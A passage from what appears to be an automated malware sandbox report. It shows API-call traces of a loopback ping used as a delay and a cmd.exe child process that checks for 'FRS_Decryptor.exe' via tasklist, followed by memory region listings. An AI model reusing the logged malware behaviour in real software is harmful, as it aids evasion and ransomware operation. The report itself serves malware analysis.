_setmode (_FileHandle=1, _Mode=32768) returned 16384 [0141.171] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.171] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe98a48 [0141.171] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe98a48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0141.171] _fileno (_File=0x76ea4c28) returned 1 [0141.171] _write (in: _FileHandle=1, _Buf=0xe98a48*, _MaxCharCount=0x9 | out: _Buf=0xe98a48*) returned 9 [0141.171] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0141.171] _fileno (_File=0x76ea4c28) returned 1 [0141.171] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0141.171] LocalFree (hMem=0xe98a48) returned 0x0 [0141.171] LocalFree (hMem=0xea7ff8) returned 0x0 [0141.171] Sleep (dwMilliseconds=0x3e8) [0142.185] IcmpSendEcho2Ex (in: IcmpHandle=0xe96bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe9c278, RequestSize=0x20, RequestOptions=0xe5f194, ReplyBuffer=0xea5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xea5270) returned 0x1 [0142.186] InetNtopW (in: Family=2, pAddr=0xe5f184, pStringBuf=0xe5f2ac, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0142.186] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="竨ê﫨å⛔\x94䰨盪✣") returned 0x16 [0142.186] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0142.186] _fileno (_File=0x76ea4c28) returned 1 [0142.186] _get_osfhandle (_FileHandle=1) returned 0x28 [0142.186] GetFileType (hFile=0x28) returned 0x2 [0142.186] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0142.186] GetLastError () returned 0x6 [0142.186] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✣") returned 0x0 [0142.186] _fileno (_File=0x76ea4c28) returned 1 [0142.186] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0142.186] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0142.186] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xea7b20 [0142.186] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xea7b20, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0142.186] _fileno (_File=0x76ea4c28) returned 1 [0142.186] _write (in: _FileHandle=1, _Buf=0xea7b20*, _MaxCharCount=0x16 | out: _Buf=0xea7b20*) returned 22 [0142.187] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0142.187] LocalFree (hMem=0xea7b20) returned 0x0 [0142.187] LocalFree (hMem=0xea7ae8) returned 0x0 [0142.187] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="翸ê﫨å⛿\x94䰨盪✼") returned 0x9 [0142.187] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _get_osfhandle (_FileHandle=1) returned 0x28 [0142.187] GetFileType (hFile=0x28) returned 0x2 [0142.187] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0142.187] GetLastError () returned 0x6 [0142.187] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✼") returned 0x0 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0142.187] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.187] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe98a78 [0142.187] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe98a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _write (in: _FileHandle=1, _Buf=0xe98a78*, _MaxCharCount=0x9 | out: _Buf=0xe98a78*) returned 9 [0142.187] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0142.187] LocalFree (hMem=0xe98a78) returned 0x0 [0142.187] LocalFree (hMem=0xea7ff8) returned 0x0 [0142.187] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xe5f11c, nSize=0x0, Arguments=0xe5f118 | out: lpBuffer="翸ê﫨å➷\x94䰨盪✧") returned 0x9 [0142.187] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _get_osfhandle (_FileHandle=1) returned 0x28 [0142.187] GetFileType (hFile=0x28) returned 0x2 [0142.187] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0e0 | out: lpMode=0xe5f0e0) returned 0 [0142.187] GetLastError () returned 0x6 [0142.187] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f044, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0142.187] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.187] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe98a90 [0142.187] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe98a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _write (in: _FileHandle=1, _Buf=0xe98a90*, _MaxCharCount=0x9 | out: _Buf=0xe98a90*) returned 9 [0142.187] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0142.187] _fileno (_File=0x76ea4c28) returned 1 [0142.187] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0142.188] LocalFree (hMem=0xe98a90) returned 0x0 [0142.188] LocalFree (hMem=0xea7ff8) returned 0x0 [0142.188] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="翸ê﫨å⟘\x94䰨盪✨") returned 0x9 [0142.188] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0142.188] _fileno (_File=0x76ea4c28) returned 1 [0142.188] _get_osfhandle (_FileHandle=1) returned 0x28 [0142.188] GetFileType (hFile=0x28) returned 0x2 [0142.188] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0142.188] GetLastError () returned 0x6 [0142.188] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✨") returned 0x0 [0142.188] _fileno (_File=0x76ea4c28) returned 1 [0142.188] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0142.188] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.188] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe989a0 [0142.188] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe989a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0142.188] _fileno (_File=0x76ea4c28) returned 1 [0142.188] _write (in: _FileHandle=1, _Buf=0xe989a0*, _MaxCharCount=0x9 | out: _Buf=0xe989a0*) returned 9 [0142.188] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0142.188] _fileno (_File=0x76ea4c28) returned 1 [0142.188] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0142.188] LocalFree (hMem=0xe989a0) returned 0x0 [0142.188] LocalFree (hMem=0xea7ff8) returned 0x0 [0142.188] Sleep (dwMilliseconds=0x3e8) [0143.201] IcmpSendEcho2Ex (in: IcmpHandle=0xe96bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe9c278, RequestSize=0x20, RequestOptions=0xe5f194, ReplyBuffer=0xea5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xea5270) returned 0x1 [0143.202] InetNtopW (in: Family=2, pAddr=0xe5f184, pStringBuf=0xe5f2ac, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0143.202] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="竨ê﫨å⛔\x94䰨盪✣") returned 0x16 [0143.202] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.202] _fileno (_File=0x76ea4c28) returned 1 [0143.202] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.202] GetFileType (hFile=0x28) returned 0x2 [0143.202] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0143.202] GetLastError () returned 0x6 [0143.202] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✣") returned 0x0 [0143.202] _fileno (_File=0x76ea4c28) returned 1 [0143.202] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.202] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0143.202] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xea7b20 [0143.202] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xea7b20, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0143.202] _fileno (_File=0x76ea4c28) returned 1 [0143.202] _write (in: _FileHandle=1, _Buf=0xea7b20*, _MaxCharCount=0x16 | out: _Buf=0xea7b20*) returned 22 [0143.202] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.202] _fileno (_File=0x76ea4c28) returned 1 [0143.202] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.202] LocalFree (hMem=0xea7b20) returned 0x0 [0143.202] LocalFree (hMem=0xea7ae8) returned 0x0 [0143.202] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="翸ê﫨å⛿\x94䰨盪✼") returned 0x9 [0143.202] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.202] _fileno (_File=0x76ea4c28) returned 1 [0143.202] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.202] GetFileType (hFile=0x28) returned 0x2 [0143.202] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0143.203] GetLastError () returned 0x6 [0143.203] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✼") returned 0x0 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.203] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe989d0 [0143.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe989d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _write (in: _FileHandle=1, _Buf=0xe989d0*, _MaxCharCount=0x9 | out: _Buf=0xe989d0*) returned 9 [0143.203] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.203] LocalFree (hMem=0xe989d0) returned 0x0 [0143.203] LocalFree (hMem=0xea7ff8) returned 0x0 [0143.203] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xe5f11c, nSize=0x0, Arguments=0xe5f118 | out: lpBuffer="翸ê﫨å➷\x94䰨盪✧") returned 0x9 [0143.203] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.203] GetFileType (hFile=0x28) returned 0x2 [0143.203] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0e0 | out: lpMode=0xe5f0e0) returned 0 [0143.203] GetLastError () returned 0x6 [0143.203] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f044, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.203] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe98a48 [0143.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe98a48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _write (in: _FileHandle=1, _Buf=0xe98a48*, _MaxCharCount=0x9 | out: _Buf=0xe98a48*) returned 9 [0143.203] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0143.203] LocalFree (hMem=0xe98a48) returned 0x0 [0143.203] LocalFree (hMem=0xea7ff8) returned 0x0 [0143.203] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xe5f118, nSize=0x0, Arguments=0xe5f114 | out: lpBuffer="翸ê﫨å⟘\x94䰨盪✨") returned 0x9 [0143.203] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.203] GetFileType (hFile=0x28) returned 0x2 [0143.203] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f0dc | out: lpMode=0xe5f0dc) returned 0 [0143.203] GetLastError () returned 0x6 [0143.203] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5f040, nSize=0x50 | out: lpBuffer="å✨") returned 0x0 [0143.203] _fileno (_File=0x76ea4c28) returned 1 [0143.203] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0143.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.204] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe989a0 [0143.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe989a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0143.204] _fileno (_File=0x76ea4c28) returned 1 [0143.204] _write (in: _FileHandle=1, _Buf=0xe989a0*, _MaxCharCount=0x9 | out: _Buf=0xe989a0*) returned 9 [0143.204] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.204] _fileno (_File=0x76ea4c28) returned 1 [0143.204] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0143.204] LocalFree (hMem=0xe989a0) returned 0x0 [0143.204] LocalFree (hMem=0xea7ff8) returned 0x0 [0143.204] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xe5f0a0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0143.204] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xe5f074, nSize=0x0, Arguments=0xe5f070 | out: lpBuffer="翸êå᧰\x94䰨盪❏") returned 0x5c [0143.204] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.204] _fileno (_File=0x76ea4c28) returned 1 [0143.204] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.204] GetFileType (hFile=0x28) returned 0x2 [0143.204] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f038 | out: lpMode=0xe5f038) returned 0 [0143.204] GetLastError () returned 0x6 [0143.204] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5ef9c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0143.204] _fileno (_File=0x76ea4c28) returned 1 [0143.204] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0143.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0143.204] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xea80c0 [0143.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xea80c0, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0143.204] _fileno (_File=0x76ea4c28) returned 1 [0143.204] _write (in: _FileHandle=1, _Buf=0xea80c0*, _MaxCharCount=0x5c | out: _Buf=0xea80c0*) returned 92 [0143.204] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.204] _fileno (_File=0x76ea4c28) returned 1 [0143.204] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0143.204] LocalFree (hMem=0xea80c0) returned 0x0 [0143.204] LocalFree (hMem=0xea7ff8) returned 0x0 [0143.204] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xe5f080, nSize=0x0, Arguments=0xe5f07c | out: lpBuffer="翸êåᨧ\x94䰨盪❓") returned 0x61 [0143.204] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.204] _fileno (_File=0x76ea4c28) returned 1 [0143.204] _get_osfhandle (_FileHandle=1) returned 0x28 [0143.204] GetFileType (hFile=0x28) returned 0x2 [0143.204] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe5f044 | out: lpMode=0xe5f044) returned 0 [0143.204] GetLastError () returned 0x6 [0143.204] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe5efa8, nSize=0x50 | out: lpBuffer="å❓") returned 0x0 [0143.204] _fileno (_File=0x76ea4c28) returned 1 [0143.204] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0143.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0143.205] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xea80c8 [0143.205] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xea80c8, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0143.205] _fileno (_File=0x76ea4c28) returned 1 [0143.205] _write (in: _FileHandle=1, _Buf=0xea80c8*, _MaxCharCount=0x61 | out: _Buf=0xea80c8*) returned 97 [0143.205] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0143.205] _fileno (_File=0x76ea4c28) returned 1 [0143.205] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0143.205] LocalFree (hMem=0xea80c8) returned 0x0 [0143.205] LocalFree (hMem=0xea7ff8) returned 0x0 [0143.205] IcmpCloseHandle (IcmpHandle=0xe96bf0) returned 1 [0143.205] LocalFree (hMem=0xe9c278) returned 0x0 [0143.205] LocalFree (hMem=0xea5270) returned 0x0 [0143.205] WSACleanup () returned 0 [0143.205] exit (_Code=0) Thread: id = 438 os_tid = 0x888 Thread: id = 439 os_tid = 0x278 Process: id = "159" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xe795000" os_pid = "0x860" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8116 start_va = 0x470000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 8117 start_va = 0x490000 end_va = 0x491fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 8118 start_va = 0x4a0000 end_va = 0x4aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 8119 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 8120 start_va = 0x4f0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 8121 start_va = 0x5f0000 end_va = 0x5f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 8122 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 8123 start_va = 0x610000 end_va = 0x611fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8124 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8125 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8126 start_va = 0x7f590000 end_va = 0x7f5b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f590000" filename = "" Region: id = 8127 start_va = 0x7f5b5000 end_va = 0x7f5b5fff entry_point = 0x0 region_type = private name = "private_0x000000007f5b5000" filename = "" Region: id = 8128 start_va = 0x7f5bc000 end_va = 0x7f5befff entry_point = 0x0 region_type = private name = "private_0x000000007f5bc000" filename = "" Region: id = 8129 start_va = 0x7f5bf000 end_va = 0x7f5bffff entry_point = 0x0 region_type = private name = "private_0x000000007f5bf000" filename = "" Region: id = 8130 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8131 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8132 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8133 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 8134 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 